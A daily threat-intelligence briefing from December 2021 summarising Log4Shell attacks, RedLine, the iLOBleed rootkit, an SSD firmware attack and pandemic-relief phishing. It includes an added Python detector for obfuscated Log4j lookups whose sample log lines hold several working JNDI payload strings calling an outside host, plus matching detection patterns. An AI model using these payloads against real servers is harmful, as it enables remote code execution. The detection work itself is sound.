
Cyware Daily Threat Intelligence, December 31, 2021


As we bid adieu to 2021, here is the last daily threat briefing of the year. The Log4Shell flaw remains an active threat to organizations as researchers uncover new attack attempts by the Aquatic Panda APT group, which tried to exploit the vulnerability at an academic institution in an attempt to steal industrial intelligence and military secrets.

Incidents impacting sensitive data were also reported in the last 24 hours. The RedLine info-stealer was seen harvesting data from Chrome, Opera, and Microsoft Edge, and a previously unknown rootkit dubbed iLOBleed was found implanted in the firmware of Hewlett Packard Enterprise's Integrated Lights-Out (iLO) management controller, where it was used to wipe the disks of the servers it manages.

Top Breaches Reported in the Last 24 Hours

Update on Cox Media Group attack
The ransomware attack on Cox Media Group has been attributed to the Iranian threat group tracked as DEV-0270. The intrusion occurred in May, and the firm became aware of it in June when some of its systems were encrypted.

Aquatic Panda makes attack attempt
Researchers exposed recent activity by the Aquatic Panda threat actors, who used a modified exploit for the Log4Shell vulnerability. The attackers made multiple attempts to harvest credentials using living-off-the-land techniques, relying on tools already present on the host rather than dropping their own malware.
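A "modified exploit" for Log4Shell usually means the JNDI lookup string was obfuscated with nested Log4j lookups (for example `${${lower:j}ndi:...}` or `${::-j}ndi:...`) and URL encoding so that a naive `${jndi:` signature misses it. The following is an added example, not code from Cyware or from the researchers cited above: a small Python triage filter that undoes URL encoding, collapses the `lower:`, `upper:` and `:-default` lookup forms from the inside out, and then matches the normalized string. The log lines are constructed for the example and the IP addresses are documentation ranges, not real indicators.

```python
import re
import urllib.parse

# Constructed sample web-server log lines (not from any real incident).
# The attacker-controlled text sits in the User-Agent or the query string.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.8 - - "GET /?x=%24%7B%24%7Blower%3Aj%7Dndi%3Aldap%3A%2F%2F198.51.100.10%2Fa%7D HTTP/1.1" 400',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.10/a}"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "-" "${${env:NOPE:-j}ndi:dns://198.51.100.10/x}"',
]

# An innermost lookup: ${...} whose body contains no further $, { or }.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")
# The thing we actually want to find once obfuscation is stripped.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z][a-z0-9+.-]*)://([^/\s}]+)", re.IGNORECASE)


def _resolve_lookup(match):
    """Evaluate one innermost Log4j lookup the way Log4j 2 would."""
    body = match.group(1)
    if ":-" in body:                      # ${env:X:-j} or ${::-j} -> default "j"
        return body.split(":-", 1)[1]
    head, sep, rest = body.partition(":")
    if sep and head.lower() == "lower":   # ${lower:J} -> "j"
        return rest.lower()
    if sep and head.lower() == "upper":   # ${upper:j} -> "J"
        return rest.upper()
    return match.group(0)                 # e.g. ${jndi:ldap://...}: leave it for the detector


def normalize(text, max_rounds=10):
    """Undo URL encoding and collapse nested lookups until the string is stable."""
    for _ in range(3):                    # handle double-encoded payloads
        decoded = urllib.parse.unquote(text)
        if decoded == text:
            break
        text = decoded
    for _ in range(max_rounds):           # bounded so a pathological input cannot spin forever
        new = _INNER_LOOKUP.sub(_resolve_lookup, text)
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """Return details of a JNDI lookup in the line, or None if nothing matched."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {"scheme": m.group(1).lower(), "target": m.group(2), "normalized": norm}


def scan_lines(lines):
    """Scan many lines; returns (index, hit) pairs for the lines that match."""
    hits = []
    for i, line in enumerate(lines):
        hit = scan_line(line)
        if hit:
            hits.append((i, hit))
    return hits


if __name__ == "__main__":
    for idx, hit in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {idx}: {hit['scheme']} lookup to {hit['target']}")
```

This is a coarse triage filter, not a replacement for patching: Log4j supports further lookup prefixes (`sys:`, `date:`, `ctx:` and others) and other encodings that this normalizer does not evaluate, so a miss is not evidence that a host was not probed. Matching on the resolved JNDI scheme and target also gives the responder something actionable, the callback address to block and hunt for in egress logs.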

Top Malware Reported in the Last 24 Hours

AvosLocker releases free decryptor
The AvosLocker operators released a free decryptor after they accidentally encrypted the systems of a U.S. government agency. Attackers took this action following the recent takedown operations undertaken by law enforcement agencies.

RedLine targets browsers
RedLine malware is targeting Chrome, Opera, and Microsoft Edge browsers in an attempt to steal information from users. The information collected includes login credentials, cryptocurrency wallet information, credit card data, cookies, IP addresses, OS information, and other system information.

New iLOBleed rootkit
A newly discovered rootkit dubbed iLOBleed was found in the wild in the firmware of Hewlett Packard Enterprise's Integrated Lights-Out (iLO) management controller and was used to wipe the disks of the affected servers. Because iLO runs on a dedicated controller beneath the host operating system, an implant at this level survives OS reinstallation and is invisible to host-based security tools, so iLO firmware versions should be verified out of band and the management interface kept off untrusted networks. The adversary behind the attack and how the implant was delivered remain unknown.

Top Vulnerabilities Reported in the Last 24 Hours

New Hardware-based attack method
Researchers have demonstrated a set of attacks against some Solid-State Drives (SSDs) that let a threat actor plant malware in the device itself. Using the drive's firmware management tooling, an attacker can resize the Over-Provisioning (OP) area, the spare capacity that the drive hides from the operating system. Shifting or shrinking that area exposes "invalid" data the drive has not yet physically erased, and enlarging it creates hidden space in which malware can be stored out of reach of the OS and host-based security tools.

Top Scams Reported in the Last 24 Hours

Phishing through pandemic relief plans
Scammers continue to exploit pandemic relief programs to pressure users into acting quickly. In one such campaign, the cybercriminals posed as representatives of the United States Small Business Administration (SBA) and offered victims fake grant applications. The applications were built with Google Forms and asked users for personal information.


Posted on: December 31, 2021
